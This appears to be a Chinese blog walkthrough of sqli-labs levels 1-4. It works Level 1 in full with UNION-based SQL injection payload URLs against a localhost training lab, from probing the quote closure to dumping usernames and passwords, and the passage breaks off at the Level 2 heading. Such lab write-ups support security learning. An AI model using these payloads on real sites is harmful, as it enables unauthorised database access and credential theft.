（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型-CFANZ编程社区

SQL注入基本步骤：

一、Less1（GET-Error based - Single quotes -String）

简介：(单引号+字符型注入)

第一步：注入点测试

第二步：查询字段数

第三步：判断回显位

第四步：查询数据库的基本信息

第五步：爆数据库名

第六步：爆数据库表名

第七步：爆字段名

第八步：爆数据

二、Less2（GET-Error based - intiger based）

简介：（整型注入）

第一步：注入点测试

第二步：查询字段数

第三步：判断回显位

第四步：查询数据库的基本信息

第五步：爆数据库名

第六步：爆数据库表名

第七步：爆字段名

第八步：爆数据

三、Less3（GET-Error based - Single quotes -String）

简介：（单引号+括号+字符型注入）

第一步：注入点测试

第二步：查询字段数

第三步：判断回显位

第四步：查询数据库的基本信息

第五步：爆数据库名

第六步：爆数据库表名

第七步：爆字段名

第八步：爆数据

四、Less4（GET-Error based - Double Quotes String）

简介：（双引号+ ）+字符型注入）

第一步：注入点测试

第二步：查询字段数

第三步：判断回显位

第四步：查询数据库的基本信息

第五步：爆数据库名

第六步：爆数据库表名

第七步：爆字段名

第八步：爆数据

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_web安全

（手工）SQL注入基本步骤：

第一步：注入点测试

第二步：查询字段数

第三步：判断回显位

第四步：查询数据库的基本信息

第五步：爆数据库名

第六步：爆数据库表名

第七步：爆字段名

第八步：爆数据

一、Less1（GET-Error based - Single quotes -String）

简介：(单引号+字符型注入)

请求方式：GET

方法：错误注入

第一步：注入点测试

测试闭合符号

http://localhost:8080/sqli-labs-master/Less-1/'

在后面加上了’

发现报错了，说明带入数据库中处理了，且闭合符合为'

可能存在注入点

（使用可能闭合的符号进行测试）

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_web安全_02

验证注入点

输入ID序号为1的进行查询

（一般没改的化就是ID为关键字）

http://localhost:8080/sqli-labs-master/Less-1/ ?id=1

（第一关都还没必要考虑注释掉后面其他的符号）

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_安全_03

回显了ID为1的用户信息

说明存在注入

判断注入类型

闭合前面单引号，注释掉后面引号

通过and连接1=1 和 1=2来判断是否为字符型注入

http://localhost:8080/sqli-labs-master/Less-1/ ?id=1' and 1=1--+

（正确回显，因为1=1确实对的，但是还不能下结论）

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_sql_04

http://localhost:8080/sqli-labs-master/Less-1/ ?id=1' and 1=2--+

（1=2是错误，且无回显，是1=2注入到数据库影响的）

所有存在字符型注入

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_sql_05

第二步：查询字段数

猜的话，使用二分法往下猜

http://localhost:8080/sqli-labs-master/Less-1/ ?id=1' order by 3 --+

（3的时候正常回显，3以下就都能回显，现在应该往上猜）

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_sql_06

http://localhost:8080/sqli-labs-master/Less-1/ ?id=1' order by 4 --+

（4的时候报错了，说明是3了）

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_sed_07

第三步：判断回显位

使用联合查询union

将id赋值为假（eg：id=-1）

http://localhost:8080/sqli-labs-master/Less-1/ ?id=-1' union select 1,2,3 --+

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_数据库_08

报错回显2，3

说明第2，3个位置可以报错回显查询

第四步：查询数据库的基本信息

在第2，3列输入需要查询的命令

http://localhost:8080/sqli-labs-master/Less-1/ ?id=-1' union select 1,database(),user() --+

报错回显

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_sed_09

第五步：爆数据库名

http://localhost:8080/sqli-labs-master/Less-1/ ?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_数据库_10

第六步：爆数据库表名

http://localhost:8080/sqli-labs-master/Less-1/ ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_sql_11

后面的表名'security'也可以直接用database()

是一样的效果

http://localhost:8080/sqli-labs-master/Less-1/ ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_安全_12

第七步：爆字段名

http://localhost:8080/sqli-labs-master/Less-1/ ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_web安全_13

第八步：爆数据

http://localhost:8080/sqli-labs-master/Less-1/ ?id=-1' union select 1,username,password from users where id=2 --+

（手工）【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型_数据库_14

二、Less2（GET-Error based - intiger based）